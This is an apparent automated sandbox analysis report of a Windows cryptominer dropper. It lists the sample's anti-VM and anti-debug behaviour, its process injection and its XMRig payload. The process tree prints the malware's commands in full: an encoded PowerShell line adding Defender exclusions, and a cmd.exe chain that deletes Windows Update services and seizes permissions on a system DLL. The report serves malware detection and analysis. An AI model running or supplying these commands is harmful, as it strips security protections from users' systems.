Analysis
-
max time kernel
300s -
max time network
294s -
platform
windows10_x64 -
resource
win10-20220414-en -
resource tags
arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system -
submitted
05-08-2022 22:18
Behavioral task
behavioral1
Sample
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
Resource
win7-20220718-en
General
-
Target
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe
-
Size
7.1MB
-
MD5
2144e985a1fb8a18636dee1b1fcf096f
-
SHA1
fac93e4f151a3be8d9b0b6c9d50a31ba9a3e231a
-
SHA256
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895
-
SHA512
48d3b4b8a95bd4a4bc1405284db373a5acdfe30de15b0641aeef359c06a359dc1344cb8bb1fb63ee35bc38e3eae3fb88eed2128d66d52e9153e1d940be54476c
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
Processes:
updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe -
XMRig Miner payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/3112-451-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3112-452-0x000000014036EAC4-mapping.dmp xmrig behavioral2/memory/3112-454-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3112-456-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3112-469-0x0000000140000000-0x0000000140809000-memory.dmp xmrig behavioral2/memory/3112-470-0x0000000140000000-0x0000000140809000-memory.dmp xmrig -
Drops file in Drivers directory 2 IoCs
Processes:
conhost.execonhost.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe -
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 2308 updater.exe -
Possible privilege escalation attempt 4 IoCs
Processes:
takeown.exeicacls.exetakeown.exeicacls.exepid process 1644 takeown.exe 4040 icacls.exe 1596 takeown.exe 3188 icacls.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
updater.exe58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
icacls.exetakeown.exeicacls.exetakeown.exepid process 4040 icacls.exe 1596 takeown.exe 3188 icacls.exe 1644 takeown.exe -
Processes:
resource yara_rule behavioral2/memory/544-118-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/544-119-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/544-121-0x0000000000400000-0x0000000001066000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/2308-261-0x0000000000400000-0x0000000001066000-memory.dmp themida behavioral2/memory/2308-263-0x0000000000400000-0x0000000001066000-memory.dmp themida -
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEpowershell.execonhost.exedescription ioc process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log conhost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exeupdater.exepid process 544 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe 2308 updater.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
conhost.exedescription pid process target process PID 2600 set thread context of 3112 2600 conhost.exe explorer.exe -
Drops file in Program Files directory 3 IoCs
Processes:
powershell.execonhost.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\updater.exe powershell.exe File created C:\Program Files\Google\Libs\WR64.sys conhost.exe File created C:\Program Files\Google\Chrome\updater.exe powershell.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 4860 sc.exe 2732 sc.exe 4808 sc.exe 3196 sc.exe 3768 sc.exe 5056 sc.exe 1896 sc.exe 2940 sc.exe 4912 sc.exe 3736 sc.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.EXEconhost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" conhost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE -
Modifies registry key 1 TTPs 18 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 1784 reg.exe 4452 reg.exe 1932 reg.exe 3876 reg.exe 3460 reg.exe 1536 reg.exe 2644 reg.exe 1848 reg.exe 1984 reg.exe 60 reg.exe 4480 reg.exe 4544 reg.exe 4788 reg.exe 2200 reg.exe 4520 reg.exe 4564 reg.exe 4536 reg.exe 1880 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.execonhost.exepowershell.exepowershell.EXEpowershell.execonhost.exeexplorer.exepid process 1196 powershell.exe 1196 powershell.exe 1196 powershell.exe 680 conhost.exe 3180 powershell.exe 3180 powershell.exe 3180 powershell.exe 1532 powershell.EXE 1532 powershell.EXE 1532 powershell.EXE 5016 powershell.exe 5016 powershell.exe 5016 powershell.exe 2600 conhost.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe 3112 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 1196 powershell.exe Token: SeIncreaseQuotaPrivilege 1196 powershell.exe Token: SeSecurityPrivilege 1196 powershell.exe Token: SeTakeOwnershipPrivilege 1196 powershell.exe Token: SeLoadDriverPrivilege 1196 powershell.exe Token: SeSystemProfilePrivilege 1196 powershell.exe Token: SeSystemtimePrivilege 1196 powershell.exe Token: SeProfSingleProcessPrivilege 1196 powershell.exe Token: SeIncBasePriorityPrivilege 1196 powershell.exe Token: SeCreatePagefilePrivilege 1196 powershell.exe Token: SeBackupPrivilege 1196 powershell.exe Token: SeRestorePrivilege 1196 powershell.exe Token: SeShutdownPrivilege 1196 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeSystemEnvironmentPrivilege 1196 powershell.exe Token: SeRemoteShutdownPrivilege 1196 powershell.exe Token: SeUndockPrivilege 1196 powershell.exe Token: SeManageVolumePrivilege 1196 powershell.exe Token: 33 1196 powershell.exe Token: 34 1196 powershell.exe Token: 35 1196 powershell.exe Token: 36 1196 powershell.exe Token: SeShutdownPrivilege 4832 powercfg.exe Token: SeCreatePagefilePrivilege 4832 powercfg.exe Token: SeDebugPrivilege 680 conhost.exe Token: SeShutdownPrivilege 4256 powercfg.exe Token: SeCreatePagefilePrivilege 4256 powercfg.exe Token: SeShutdownPrivilege 4208 powercfg.exe Token: SeCreatePagefilePrivilege 4208 powercfg.exe Token: SeShutdownPrivilege 4192 powercfg.exe Token: SeCreatePagefilePrivilege 4192 powercfg.exe Token: SeTakeOwnershipPrivilege 1644 takeown.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeIncreaseQuotaPrivilege 3180 powershell.exe Token: SeSecurityPrivilege 3180 powershell.exe Token: SeTakeOwnershipPrivilege 3180 powershell.exe Token: SeLoadDriverPrivilege 3180 powershell.exe Token: SeSystemProfilePrivilege 3180 powershell.exe Token: SeSystemtimePrivilege 3180 powershell.exe Token: SeProfSingleProcessPrivilege 3180 powershell.exe Token: SeIncBasePriorityPrivilege 3180 powershell.exe Token: SeCreatePagefilePrivilege 3180 powershell.exe Token: SeBackupPrivilege 3180 powershell.exe Token: SeRestorePrivilege 3180 powershell.exe Token: SeShutdownPrivilege 3180 powershell.exe Token: SeDebugPrivilege 3180 powershell.exe Token: SeSystemEnvironmentPrivilege 3180 powershell.exe Token: SeRemoteShutdownPrivilege 3180 powershell.exe Token: SeUndockPrivilege 3180 powershell.exe Token: SeManageVolumePrivilege 3180 powershell.exe Token: 33 3180 powershell.exe Token: 34 3180 powershell.exe Token: 35 3180 powershell.exe Token: 36 3180 powershell.exe Token: SeIncreaseQuotaPrivilege 3180 powershell.exe Token: SeSecurityPrivilege 3180 powershell.exe Token: SeTakeOwnershipPrivilege 3180 powershell.exe Token: SeLoadDriverPrivilege 3180 powershell.exe Token: SeSystemProfilePrivilege 3180 powershell.exe Token: SeSystemtimePrivilege 3180 powershell.exe Token: SeProfSingleProcessPrivilege 3180 powershell.exe Token: SeIncBasePriorityPrivilege 3180 powershell.exe Token: SeCreatePagefilePrivilege 3180 powershell.exe Token: SeBackupPrivilege 3180 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.execonhost.execmd.execmd.exedescription pid process target process PID 544 wrote to memory of 680 544 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 544 wrote to memory of 680 544 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 544 wrote to memory of 680 544 58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe conhost.exe PID 680 wrote to memory of 1196 680 conhost.exe powershell.exe PID 680 wrote to memory of 1196 680 conhost.exe powershell.exe PID 680 wrote to memory of 4252 680 conhost.exe cmd.exe PID 680 wrote to memory of 4252 680 conhost.exe cmd.exe PID 680 wrote to memory of 4884 680 conhost.exe cmd.exe PID 680 wrote to memory of 4884 680 conhost.exe cmd.exe PID 4252 wrote to memory of 3768 4252 cmd.exe sc.exe PID 4252 wrote to memory of 3768 4252 cmd.exe sc.exe PID 4884 wrote to memory of 4832 4884 cmd.exe powercfg.exe PID 4884 wrote to memory of 4832 4884 cmd.exe powercfg.exe PID 4252 wrote to memory of 4860 4252 cmd.exe sc.exe PID 4252 wrote to memory of 4860 4252 cmd.exe sc.exe PID 4884 wrote to memory of 4256 4884 cmd.exe powercfg.exe PID 4884 wrote to memory of 4256 4884 cmd.exe powercfg.exe PID 4252 wrote to memory of 5056 4252 cmd.exe sc.exe PID 4252 wrote to memory of 5056 4252 cmd.exe sc.exe PID 4884 wrote to memory of 4208 4884 cmd.exe powercfg.exe PID 4884 wrote to memory of 4208 4884 cmd.exe powercfg.exe PID 4884 wrote to memory of 4192 4884 cmd.exe powercfg.exe PID 4884 wrote to memory of 4192 4884 cmd.exe powercfg.exe PID 4252 wrote to memory of 2732 4252 cmd.exe sc.exe PID 4252 wrote to memory of 2732 4252 cmd.exe sc.exe PID 4252 wrote to memory of 1896 4252 cmd.exe sc.exe PID 4252 wrote to memory of 1896 4252 cmd.exe sc.exe PID 4252 wrote to memory of 1932 4252 cmd.exe reg.exe PID 4252 wrote to memory of 1932 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4788 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4788 4252 cmd.exe reg.exe PID 4252 wrote to memory of 2200 4252 cmd.exe reg.exe PID 4252 wrote to memory of 2200 4252 cmd.exe reg.exe PID 4252 wrote to memory of 3876 4252 cmd.exe reg.exe PID 4252 wrote to memory of 3876 4252 cmd.exe reg.exe PID 4252 wrote to memory of 60 4252 cmd.exe reg.exe PID 4252 wrote to memory of 60 4252 cmd.exe reg.exe PID 4252 wrote to memory of 1644 4252 cmd.exe takeown.exe PID 4252 wrote to memory of 1644 4252 cmd.exe takeown.exe PID 680 wrote to memory of 3180 680 conhost.exe powershell.exe PID 680 wrote to memory of 3180 680 conhost.exe powershell.exe PID 4252 wrote to memory of 4040 4252 cmd.exe icacls.exe PID 4252 wrote to memory of 4040 4252 cmd.exe icacls.exe PID 4252 wrote to memory of 4480 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4480 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4520 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4520 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4544 4252 cmd.exe reg.exe PID 4252 wrote to memory of 4544 4252 cmd.exe reg.exe PID 4252 wrote to memory of 1784 4252 cmd.exe reg.exe PID 4252 wrote to memory of 1784 4252 cmd.exe reg.exe PID 4252 wrote to memory of 3188 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 3188 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 2956 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 2956 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 4640 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 4640 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 1576 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 1576 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 1884 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 1884 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 2612 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 2612 4252 cmd.exe schtasks.exe PID 4252 wrote to memory of 4664 4252 cmd.exe schtasks.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\58e801dfdaa75ef977fea01a200f90e7202406833a1e2c06ebe15a99a72c3895.exe"2⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
